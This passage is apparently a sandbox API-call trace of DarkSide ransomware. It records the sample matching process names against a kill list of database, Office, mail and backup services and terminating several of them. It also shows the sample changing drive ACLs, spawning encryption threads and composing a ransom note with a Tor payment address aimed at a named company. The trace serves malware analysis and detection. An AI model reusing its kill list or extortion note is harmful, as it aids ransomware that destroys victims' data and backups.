0x8 [0148.485] wcsstr (_Str="csrss.exe", _SubStr="mspub") returned 0x0 [0148.486] wcslen (_String="mspub") returned 0x5 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="onenote") returned 0x0 [0148.486] wcslen (_String="onenote") returned 0x7 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="outlook") returned 0x0 [0148.486] wcslen (_String="outlook") returned 0x7 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="powerpnt") returned 0x0 [0148.486] wcslen (_String="powerpnt") returned 0x8 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="steam") returned 0x0 [0148.486] wcslen (_String="steam") returned 0x5 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="thebat") returned 0x0 [0148.486] wcslen (_String="thebat") returned 0x6 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="thunderbird") returned 0x0 [0148.486] wcslen (_String="thunderbird") returned 0xb [0148.486] wcsstr (_Str="csrss.exe", _SubStr="visio") returned 0x0 [0148.486] wcslen (_String="visio") returned 0x5 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="winword") returned 0x0 [0148.486] wcslen (_String="winword") returned 0x7 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="wordpad") returned 0x0 [0148.486] wcslen (_String="wordpad") returned 0x7 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="notepad") returned 0x0 [0148.486] wcslen (_String="notepad") returned 0x7 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="bedbh") returned 0x0 [0148.486] wcslen (_String="bedbh") returned 0x5 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="vxmon") returned 0x0 [0148.486] wcslen (_String="vxmon") returned 0x5 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="benetns") returned 0x0 [0148.486] wcslen (_String="benetns") returned 0x7 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="bengien") returned 0x0 [0148.486] wcslen (_String="bengien") returned 0x7 [0148.486] wcsstr (_Str="csrss.exe", _SubStr="pvlsvr") returned 0x0 [0148.487] wcslen (_String="pvlsvr") returned 0x6 [0148.487] wcsstr (_Str="csrss.exe", _SubStr="beserver") returned 0x0 [0148.487] wcslen (_String="beserver") returned 0x8 [0148.487] wcsstr (_Str="csrss.exe", _SubStr="raw_agent_svc") returned 0x0 [0148.487] wcslen (_String="raw_agent_svc") returned 0xd [0148.487] wcsstr (_Str="csrss.exe", _SubStr="vsnapvss") returned 0x0 [0148.487] wcslen (_String="vsnapvss") returned 0x8 [0148.487] wcsstr (_Str="csrss.exe", _SubStr="CagService") returned 0x0 [0148.487] wcslen (_String="CagService") returned 0xa [0148.487] wcsstr (_Str="csrss.exe", _SubStr="QBIDPService") returned 0x0 [0148.487] wcslen (_String="QBIDPService") returned 0xc [0148.487] wcsstr (_Str="csrss.exe", _SubStr="QBDBMgrN") returned 0x0 [0148.487] wcslen (_String="QBDBMgrN") returned 0x8 [0148.487] wcsstr (_Str="csrss.exe", _SubStr="QBCFMonitorService") returned 0x0 [0148.487] wcslen (_String="QBCFMonitorService") returned 0x12 [0148.487] wcsstr (_Str="csrss.exe", _SubStr="SAP") returned 0x0 [0148.487] wcslen (_String="SAP") returned 0x3 [0148.487] wcsstr (_Str="csrss.exe", _SubStr="TeamViewer_Service.exe") returned 0x0 [0148.487] wcslen (_String="TeamViewer_Service.exe") returned 0x16 [0148.487] wcsstr (_Str="csrss.exe", _SubStr="TeamViewer.exe") returned 0x0 [0148.487] wcslen (_String="TeamViewer.exe") returned 0xe [0148.487] wcsstr (_Str="csrss.exe", _SubStr="tv_w32.exe") returned 0x0 [0148.487] wcslen (_String="tv_w32.exe") returned 0xa [0148.487] wcsstr (_Str="csrss.exe", _SubStr="tv_x64.exe") returned 0x0 [0148.487] wcslen (_String="tv_x64.exe") returned 0xa [0148.487] wcsstr (_Str="csrss.exe", _SubStr="CVMountd") returned 0x0 [0148.487] wcslen (_String="CVMountd") returned 0x8 [0148.487] wcsstr (_Str="csrss.exe", _SubStr="cvd") returned 0x0 [0148.487] wcslen (_String="cvd") returned 0x3 [0148.487] wcsstr (_Str="csrss.exe", _SubStr="cvfwd") returned 0x0 [0148.488] wcslen (_String="cvfwd") returned 0x5 [0148.488] wcsstr (_Str="csrss.exe", _SubStr="CVODS") returned 0x0 [0148.488] wcslen (_String="CVODS") returned 0x5 [0148.488] wcsstr (_Str="csrss.exe", _SubStr="saphostexec") returned 0x0 [0148.488] wcslen (_String="saphostexec") returned 0xb [0148.488] wcsstr (_Str="csrss.exe", _SubStr="saposcol") returned 0x0 [0148.488] wcslen (_String="saposcol") returned 0x8 [0148.488] wcsstr (_Str="csrss.exe", _SubStr="sapstartsrv") returned 0x0 [0148.488] wcslen (_String="sapstartsrv") returned 0xb [0148.488] wcsstr (_Str="csrss.exe", _SubStr="avagent") returned 0x0 [0148.488] wcslen (_String="avagent") returned 0x7 [0148.488] wcsstr (_Str="csrss.exe", _SubStr="avscc") returned 0x0 [0148.488] wcslen (_String="avscc") returned 0x5 [0148.488] wcsstr (_Str="csrss.exe", _SubStr="DellSystemDetect") returned 0x0 [0148.488] wcslen (_String="DellSystemDetect") returned 0x10 [0148.488] wcsstr (_Str="csrss.exe", _SubStr="EnterpriseClient") returned 0x0 [0148.488] wcslen (_String="EnterpriseClient") returned 0x10 [0148.488] wcsstr (_Str="csrss.exe", _SubStr="VeeamNFSSvc") returned 0x0 [0148.488] wcslen (_String="VeeamNFSSvc") returned 0xb [0148.488] wcsstr (_Str="csrss.exe", _SubStr="VeeamTransportSvc") returned 0x0 [0148.488] wcslen (_String="VeeamTransportSvc") returned 0x11 [0148.488] wcsstr (_Str="csrss.exe", _SubStr="VeeamDeploymentSvc") returned 0x0 [0148.488] wcslen (_String="VeeamDeploymentSvc") returned 0x12 [0148.488] _wcslwr (in: _String=0x157b18 | out: _String="wininit.exe") returned="wininit.exe" [0148.488] wcsstr (_Str="wininit.exe", _SubStr="sql") returned 0x0 [0148.488] wcslen (_String="sql") returned 0x3 [0148.488] wcsstr (_Str="wininit.exe", _SubStr="oracle") returned 0x0 [0148.488] wcslen (_String="oracle") returned 0x6 [0148.488] wcsstr (_Str="wininit.exe", _SubStr="ocssd") returned 0x0 [0148.488] wcslen (_String="ocssd") returned 0x5 [0148.489] wcsstr (_Str="wininit.exe", _SubStr="dbsnmp") returned 0x0 [0148.489] wcslen (_String="dbsnmp") returned 0x6 [0148.489] wcsstr (_Str="wininit.exe", _SubStr="synctime") returned 0x0 [0148.489] wcslen (_String="synctime") returned 0x8 [0148.489] wcsstr (_Str="wininit.exe", _SubStr="agntsvc") returned 0x0 [0148.489] wcslen (_String="agntsvc") returned 0x7 [0148.489] wcsstr (_Str="wininit.exe", _SubStr="isqlplussvc") returned 0x0 [0148.489] wcslen (_String="isqlplussvc") returned 0xb [0148.489] wcsstr (_Str="wininit.exe", _SubStr="xfssvccon") returned 0x0 [0148.489] wcslen (_String="xfssvccon") returned 0x9 [0148.489] wcsstr (_Str="wininit.exe", _SubStr="mydesktopservice") returned 0x0 [0148.489] wcslen (_String="mydesktopservice") returned 0x10 [0148.489] wcsstr (_Str="wininit.exe", _SubStr="ocautoupds") returned 0x0 [0148.489] wcslen (_String="ocautoupds") returned 0xa [0148.489] wcsstr (_Str="wininit.exe", _SubStr="encsvc") returned 0x0 [0148.489] wcslen (_String="encsvc") returned 0x6 [0148.489] wcsstr (_Str="wininit.exe", _SubStr="firefox") returned 0x0 [0148.489] wcslen (_String="firefox") returned 0x7 [0148.489] wcsstr (_Str="wininit.exe", _SubStr="tbirdconfig") returned 0x0 [0148.489] wcslen (_String="tbirdconfig") returned 0xb [0148.489] wcsstr (_Str="wininit.exe", _SubStr="mydesktopqos") returned 0x0 [0148.489] wcslen (_String="mydesktopqos") returned 0xc [0148.489] wcsstr (_Str="wininit.exe", _SubStr="ocomm") returned 0x0 [0148.489] wcslen (_String="ocomm") returned 0x5 [0148.489] wcsstr (_Str="wininit.exe", _SubStr="dbeng50") returned 0x0 [0148.489] wcslen (_String="dbeng50") returned 0x7 [0148.489] wcsstr (_Str="wininit.exe", _SubStr="sqbcoreservice") returned 0x0 [0148.489] wcslen (_String="sqbcoreservice") returned 0xe [0148.489] wcsstr (_Str="wininit.exe", _SubStr="excel") returned 0x0 [0148.489] wcslen (_String="excel") returned 0x5 [0148.489] wcsstr (_Str="wininit.exe", _SubStr="infopath") returned 0x0 [0148.489] wcslen (_String="infopath") returned 0x8 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="msaccess") returned 0x0 [0148.490] wcslen (_String="msaccess") returned 0x8 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="mspub") returned 0x0 [0148.490] wcslen (_String="mspub") returned 0x5 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="onenote") returned 0x0 [0148.490] wcslen (_String="onenote") returned 0x7 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="outlook") returned 0x0 [0148.490] wcslen (_String="outlook") returned 0x7 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="powerpnt") returned 0x0 [0148.490] wcslen (_String="powerpnt") returned 0x8 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="steam") returned 0x0 [0148.490] wcslen (_String="steam") returned 0x5 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="thebat") returned 0x0 [0148.490] wcslen (_String="thebat") returned 0x6 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="thunderbird") returned 0x0 [0148.490] wcslen (_String="thunderbird") returned 0xb [0148.490] wcsstr (_Str="wininit.exe", _SubStr="visio") returned 0x0 [0148.490] wcslen (_String="visio") returned 0x5 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="winword") returned 0x0 [0148.490] wcslen (_String="winword") returned 0x7 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="wordpad") returned 0x0 [0148.490] wcslen (_String="wordpad") returned 0x7 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="notepad") returned 0x0 [0148.490] wcslen (_String="notepad") returned 0x7 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="bedbh") returned 0x0 [0148.490] wcslen (_String="bedbh") returned 0x5 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="vxmon") returned 0x0 [0148.490] wcslen (_String="vxmon") returned 0x5 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="benetns") returned 0x0 [0148.490] wcslen (_String="benetns") returned 0x7 [0148.490] wcsstr (_Str="wininit.exe", _SubStr="bengien") returned 0x0 [0148.490] wcslen (_String="bengien") returned 0x7 [0148.491] wcsstr (_Str="wininit.exe", _SubStr="pvlsvr") returned 0x0 [0148.491] wcslen (_String="pvlsvr") returned 0x6 [0148.491] wcsstr (_Str="wininit.exe", _SubStr="beserver") returned 0x0 [0148.491] wcslen (_String="beserver") returned 0x8 [0148.491] wcsstr (_Str="wininit.exe", _SubStr="raw_agent_svc") returned 0x0 [0148.491] wcslen (_String="raw_agent_svc") returned 0xd [0148.491] wcsstr (_Str="wininit.exe", _SubStr="vsnapvss") returned 0x0 [0148.491] wcslen (_String="vsnapvss") returned 0x8 [0148.491] wcsstr (_Str="wininit.exe", _SubStr="CagService") returned 0x0 [0148.491] wcslen (_String="CagService") returned 0xa [0148.491] wcsstr (_Str="wininit.exe", _SubStr="QBIDPService") returned 0x0 [0148.491] wcslen (_String="QBIDPService") returned 0xc [0148.491] wcsstr (_Str="wininit.exe", _SubStr="QBDBMgrN") returned 0x0 [0148.491] wcslen (_String="QBDBMgrN") returned 0x8 [0148.491] wcsstr (_Str="wininit.exe", _SubStr="QBCFMonitorService") returned 0x0 [0148.491] wcslen (_String="QBCFMonitorService") returned 0x12 [0148.491] wcsstr (_Str="wininit.exe", _SubStr="SAP") returned 0x0 [0148.491] wcslen (_String="SAP") returned 0x3 [0148.491] wcsstr (_Str="wininit.exe", _SubStr="TeamViewer_Service.exe") returned 0x0 [0148.491] wcslen (_String="TeamViewer_Service.exe") returned 0x16 [0148.491] wcsstr (_Str="wininit.exe", _SubStr="TeamViewer.exe") returned 0x0 [0148.491] wcslen (_String="TeamViewer.exe") returned 0xe [0148.491] wcsstr (_Str="wininit.exe", _SubStr="tv_w32.exe") returned 0x0 [0148.491] wcslen (_String="tv_w32.exe") returned 0xa [0148.491] wcsstr (_Str="wininit.exe", _SubStr="tv_x64.exe") returned 0x0 [0148.491] wcslen (_String="tv_x64.exe") returned 0xa [0148.491] wcsstr (_Str="wininit.exe", _SubStr="CVMountd") returned 0x0 [0148.491] wcslen (_String="CVMountd") returned 0x8 [0148.491] wcsstr (_Str="wininit.exe", _SubStr="cvd") returned 0x0 [0148.491] wcslen (_String="cvd") returned 0x3 [0148.491] wcsstr (_Str="wininit.exe", _SubStr="cvfwd") returned 0x0 [0148.491] wcslen (_String="cvfwd") returned 0x5 [0148.491] wcsstr (_Str="wininit.exe", _SubStr="CVODS") returned 0x0 [0148.492] wcslen (_String="CVODS") returned 0x5 [0148.492] wcsstr (_Str="wininit.exe", _SubStr="saphostexec") returned 0x0 [0148.492] wcslen (_String="saphostexec") returned 0xb [0148.492] wcsstr (_Str="wininit.exe", _SubStr="saposcol") returned 0x0 [0148.492] wcslen (_String="saposcol") returned 0x8 [0148.492] wcsstr (_Str="wininit.exe", _SubStr="sapstartsrv") returned 0x0 [0148.492] wcslen (_String="sapstartsrv") returned 0xb [0148.492] wcsstr (_Str="wininit.exe", _SubStr="avagent") returned 0x0 [0148.492] wcslen (_String="avagent") returned 0x7 [0148.492] wcsstr (_Str="wininit.exe", _SubStr="avscc") returned 0x0 [0148.492] wcslen (_String="avscc") returned 0x5 [0148.492] wcsstr (_Str="wininit.exe", _SubStr="DellSystemDetect") returned 0x0 [0148.492] wcslen (_String="DellSystemDetect") returned 0x10 [0148.492] wcsstr (_Str="wininit.exe", _SubStr="EnterpriseClient") returned 0x0 [0148.492] wcslen (_String="EnterpriseClient") returned 0x10 [0148.492] wcsstr (_Str="wininit.exe", _SubStr="VeeamNFSSvc") returned 0x0 [0148.492] wcslen (_String="VeeamNFSSvc") returned 0xb [0148.492] wcsstr (_Str="wininit.exe", _SubStr="VeeamTransportSvc") returned 0x0 [0148.492] wcslen (_String="VeeamTransportSvc") returned 0x11 [0148.492] wcsstr (_Str="wininit.exe", _SubStr="VeeamDeploymentSvc") returned 0x0 [0148.492] wcslen (_String="VeeamDeploymentSvc") returned 0x12 [0148.492] _wcslwr (in: _String=0x157da8 | out: _String="csrss.exe") returned="csrss.exe" [0148.492] wcsstr (_Str="csrss.exe", _SubStr="sql") returned 0x0 [0148.492] wcslen (_String="sql") returned 0x3 [0148.492] _wcslwr (in: _String=0x157f78 | out: _String="winlogon.exe") returned="winlogon.exe" [0148.492] _wcslwr (in: _String=0x158290 | out: _String="services.exe") returned="services.exe" [0148.492] _wcslwr (in: _String=0x1584e8 | out: _String="lsass.exe") returned="lsass.exe" [0148.492] _wcslwr (in: _String=0x158838 | out: _String="lsm.exe") returned="lsm.exe" [0148.492] _wcslwr (in: _String=0x158c40 | out: _String="svchost.exe") returned="svchost.exe" [0148.493] _wcslwr (in: _String=0x158ed0 | out: _String="svchost.exe") returned="svchost.exe" [0148.493] _wcslwr (in: _String=0x1594e0 | out: _String="svchost.exe") returned="svchost.exe" [0148.493] _wcslwr (in: _String=0x159ab0 | out: _String="svchost.exe") returned="svchost.exe" [0148.493] _wcslwr (in: _String=0x15a400 | out: _String="svchost.exe") returned="svchost.exe" [0148.493] _wcslwr (in: _String=0x15a610 | out: _String="audiodg.exe") returned="audiodg.exe" [0148.493] _wcslwr (in: _String=0x15aa20 | out: _String="svchost.exe") returned="svchost.exe" [0148.493] _wcslwr (in: _String=0x15aeb0 | out: _String="svchost.exe") returned="svchost.exe" [0148.493] _wcslwr (in: _String=0x15b080 | out: _String="dwm.exe") returned="dwm.exe" [0148.493] _wcslwr (in: _String=0x15b908 | out: _String="explorer.exe") returned="explorer.exe" [0148.493] _wcslwr (in: _String=0x15bd60 | out: _String="spoolsv.exe") returned="spoolsv.exe" [0148.493] _wcslwr (in: _String=0x15c2f0 | out: _String="svchost.exe") returned="svchost.exe" [0148.493] _wcslwr (in: _String=0x15c680 | out: _String="taskhost.exe") returned="taskhost.exe" [0148.493] _wcslwr (in: _String=0x15c898 | out: _String="taskeng.exe") returned="taskeng.exe" [0148.493] _wcslwr (in: _String=0x15c9e8 | out: _String="seriously.exe") returned="seriously.exe" [0148.493] _wcslwr (in: _String=0x15cb40 | out: _String="iron.exe") returned="iron.exe" [0148.493] _wcslwr (in: _String=0x15cc90 | out: _String="awkim.exe") returned="awkim.exe" [0148.493] _wcslwr (in: _String=0x15cde0 | out: _String="punk cumshots rising.exe") returned="punk cumshots rising.exe" [0148.493] _wcslwr (in: _String=0x15cf50 | out: _String="hans_directions.exe") returned="hans_directions.exe" [0148.493] _wcslwr (in: _String=0x15d0b0 | out: _String="webshots.exe") returned="webshots.exe" [0148.493] _wcslwr (in: _String=0x15d208 | out: _String="worthy.exe") returned="worthy.exe" [0148.493] _wcslwr (in: _String=0x15d358 | out: _String="together-cio.exe") returned="together-cio.exe" [0148.493] _wcslwr (in: _String=0x15d4b8 | out: _String="hsairportmat.exe") returned="hsairportmat.exe" [0148.493] _wcslwr (in: _String=0x15d618 | out: _String="protest.exe") returned="protest.exe" [0148.493] _wcslwr (in: _String=0x15d768 | out: _String="super_rhythm.exe") returned="super_rhythm.exe" [0148.494] _wcslwr (in: _String=0x15d8c8 | out: _String="obtaining.exe") returned="obtaining.exe" [0148.494] _wcslwr (in: _String=0x15da20 | out: _String="safari-eternal-paths.exe") returned="safari-eternal-paths.exe" [0148.494] _wcslwr (in: _String=0x15db90 | out: _String="strain-doc-favor.exe") returned="strain-doc-favor.exe" [0148.494] _wcslwr (in: _String=0x15dcf8 | out: _String="replyignoresmoking.exe") returned="replyignoresmoking.exe" [0148.494] _wcslwr (in: _String=0x15de60 | out: _String="whole.exe") returned="whole.exe" [0148.494] _wcslwr (in: _String=0x15dfb0 | out: _String="brooks.exe") returned="brooks.exe" [0148.494] _wcslwr (in: _String=0x15e100 | out: _String="t experimental.exe") returned="t experimental.exe" [0148.494] _wcslwr (in: _String=0x15e260 | out: _String="3dftp.exe") returned="3dftp.exe" [0148.494] _wcslwr (in: _String=0x15e3b0 | out: _String="absolutetelnet.exe") returned="absolutetelnet.exe" [0148.494] _wcslwr (in: _String=0x15e510 | out: _String="alftp.exe") returned="alftp.exe" [0148.494] _wcslwr (in: _String=0x15e660 | out: _String="barca.exe") returned="barca.exe" [0148.494] _wcslwr (in: _String=0x15e7b0 | out: _String="bitkinex.exe") returned="bitkinex.exe" [0148.494] _wcslwr (in: _String=0x15e908 | out: _String="coreftp.exe") returned="coreftp.exe" [0148.494] _wcslwr (in: _String=0x15ea58 | out: _String="far.exe") returned="far.exe" [0148.494] _wcslwr (in: _String=0x15eba0 | out: _String="filezilla.exe") returned="filezilla.exe" [0148.494] _wcslwr (in: _String=0x15ecf8 | out: _String="flashfxp.exe") returned="flashfxp.exe" [0148.494] _wcslwr (in: _String=0x15ee50 | out: _String="fling.exe") returned="fling.exe" [0148.494] _wcslwr (in: _String=0x15efa0 | out: _String="foxmailincmail.exe") returned="foxmailincmail.exe" [0148.494] _wcslwr (in: _String=0x15f100 | out: _String="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0148.494] _wcslwr (in: _String=0x15f268 | out: _String="icq.exe") returned="icq.exe" [0148.494] _wcslwr (in: _String=0x15f3b0 | out: _String="leechftp.exe") returned="leechftp.exe" [0148.494] _wcslwr (in: _String=0x15f508 | out: _String="ncftp.exe") returned="ncftp.exe" [0148.494] _wcslwr (in: _String=0x15f658 | out: _String="notepad.exe") returned="notepad.exe" [0148.495] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x810) returned 0x130 [0148.495] TerminateProcess (hProcess=0x130, uExitCode=0x0) returned 1 [0148.495] CloseHandle (hObject=0x130) returned 1 [0148.496] _wcslwr (in: _String=0x15f7a8 | out: _String="operamail.exe") returned="operamail.exe" [0148.496] _wcslwr (in: _String=0x15f900 | out: _String="outlook.exe") returned="outlook.exe" [0148.496] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x830) returned 0x130 [0148.496] TerminateProcess (hProcess=0x130, uExitCode=0x0) returned 1 [0148.496] CloseHandle (hObject=0x130) returned 1 [0148.496] _wcslwr (in: _String=0x15fa50 | out: _String="pidgin.exe") returned="pidgin.exe" [0148.496] _wcslwr (in: _String=0x15fba0 | out: _String="scriptftp.exe") returned="scriptftp.exe" [0148.496] _wcslwr (in: _String=0x15fcf8 | out: _String="skype.exe") returned="skype.exe" [0148.496] _wcslwr (in: _String=0x15fe48 | out: _String="smartftp.exe") returned="smartftp.exe" [0148.496] _wcslwr (in: _String=0x15ffa0 | out: _String="thunderbird.exe") returned="thunderbird.exe" [0148.496] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x880) returned 0x130 [0148.496] TerminateProcess (hProcess=0x130, uExitCode=0x0) returned 1 [0148.497] CloseHandle (hObject=0x130) returned 1 [0148.497] _wcslwr (in: _String=0x1600f8 | out: _String="trillian.exe") returned="trillian.exe" [0148.497] _wcslwr (in: _String=0x160250 | out: _String="webdrive.exe") returned="webdrive.exe" [0148.497] _wcslwr (in: _String=0x1603a8 | out: _String="whatsapp.exe") returned="whatsapp.exe" [0148.497] _wcslwr (in: _String=0x160500 | out: _String="winscp.exe") returned="winscp.exe" [0148.497] _wcslwr (in: _String=0x160650 | out: _String="yahoomessenger.exe") returned="yahoomessenger.exe" [0148.497] _wcslwr (in: _String=0x1607b0 | out: _String="active-charge.exe") returned="active-charge.exe" [0148.497] _wcslwr (in: _String=0x160910 | out: _String="accupos.exe") returned="accupos.exe" [0148.497] _wcslwr (in: _String=0x160a60 | out: _String="afr38.exe") returned="afr38.exe" [0148.497] _wcslwr (in: _String=0x160bb0 | out: _String="aldelo.exe") returned="aldelo.exe" [0148.497] _wcslwr (in: _String=0x160d00 | out: _String="ccv_server.exe") returned="ccv_server.exe" [0148.497] _wcslwr (in: _String=0x160e58 | out: _String="centralcreditcard.exe") returned="centralcreditcard.exe" [0148.497] _wcslwr (in: _String=0x160fc0 | out: _String="creditservice.exe") returned="creditservice.exe" [0148.497] _wcslwr (in: _String=0x161120 | out: _String="edcsvr.exe") returned="edcsvr.exe" [0148.497] _wcslwr (in: _String=0x161270 | out: _String="fpos.exe") returned="fpos.exe" [0148.497] _wcslwr (in: _String=0x1613c0 | out: _String="isspos.exe") returned="isspos.exe" [0148.497] _wcslwr (in: _String=0x161510 | out: _String="mxslipstream.exe") returned="mxslipstream.exe" [0148.498] _wcslwr (in: _String=0x161670 | out: _String="omnipos.exe") returned="omnipos.exe" [0148.498] _wcslwr (in: _String=0x1617c0 | out: _String="spcwin.exe") returned="spcwin.exe" [0148.498] _wcslwr (in: _String=0x161910 | out: _String="spgagentservice.exe") returned="spgagentservice.exe" [0148.498] _wcslwr (in: _String=0x161a70 | out: _String="utg2.exe") returned="utg2.exe" [0148.498] _wcslwr (in: _String=0x161bc0 | out: _String="mailscriticismdan.exe") returned="mailscriticismdan.exe" [0148.498] _wcslwr (in: _String=0x161d28 | out: _String="messages.exe") returned="messages.exe" [0148.498] _wcslwr (in: _String=0x162000 | out: _String="wmiprvse.exe") returned="wmiprvse.exe" [0148.498] _wcslwr (in: _String=0x1622d8 | out: _String="wmiprvse.exe") returned="wmiprvse.exe" [0148.498] _wcslwr (in: _String=0x162670 | out: _String="taskhost.exe") returned="taskhost.exe" [0148.498] _wcslwr (in: _String=0x162848 | out: _String="idfoodsf.exe") returned="idfoodsf.exe" [0148.498] _wcslwr (in: _String=0x162aa0 | out: _String="svchost.exe") returned="svchost.exe" [0148.498] _wcslwr (in: _String=0x162cf0 | out: _String="sppsvc.exe") returned="sppsvc.exe" [0148.498] _wcslwr (in: _String=0x163080 | out: _String="svchost.exe") returned="svchost.exe" [0148.498] _wcslwr (in: _String=0x1632d0 | out: _String="vssvc.exe") returned="vssvc.exe" [0148.498] _wcslwr (in: _String=0x163520 | out: _String="taskhost.exe") returned="taskhost.exe" [0148.498] _wcslwr (in: _String=0x163778 | out: _String="svchost.exe") returned="svchost.exe" [0148.498] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1561c0) returned 1 [0148.498] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x17d2d8) returned 1 [0148.498] GetLogicalDriveStringsW (in: nBufferLength=0x80, lpBuffer=0x32f86c | out: lpBuffer="C:\\") returned 0x4 [0148.499] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0148.499] wcscpy (in: _Dest=0x32f974, _Source="C:\\" | out: _Dest="C:\\") returned="C:\\" [0148.499] GetDiskFreeSpaceExW (in: lpDirectoryName="\\\\?\\C:\\", lpFreeBytesAvailableToCaller=0x32f840, lpTotalNumberOfBytes=0x0, lpTotalNumberOfFreeBytes=0x0 | out: lpFreeBytesAvailableToCaller=0x32f840, lpTotalNumberOfBytes=0x0, lpTotalNumberOfFreeBytes=0x0) returned 1 [0148.499] GetNativeSystemInfo (in: lpSystemInfo=0x32f81c | out: lpSystemInfo=0x32f81c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0148.499] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0148.499] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0148.499] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5bcc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c [0148.501] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5e73, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x140 [0148.501] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5bcc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x144 [0148.502] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5e73, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x148 [0148.503] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5bcc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14c [0148.504] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5e73, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x150 [0148.504] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5bcc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x154 [0148.505] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5e73, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x158 [0148.506] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1561c0 [0148.506] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1661c8 [0148.507] wcscpy (in: _Dest=0x1561c0, _Source="\\\\?\\C:\\" | out: _Dest="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0148.507] GetNamedSecurityInfoW () returned 0x0 [0148.852] SetEntriesInAclW () returned 0x0 [0148.852] SetNamedSecurityInfoW () returned 0x0 [0149.088] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x152ed8) returned 1 [0149.088] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f2ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0149.088] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\" (normalized: "c:")) returned 1 [0149.088] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 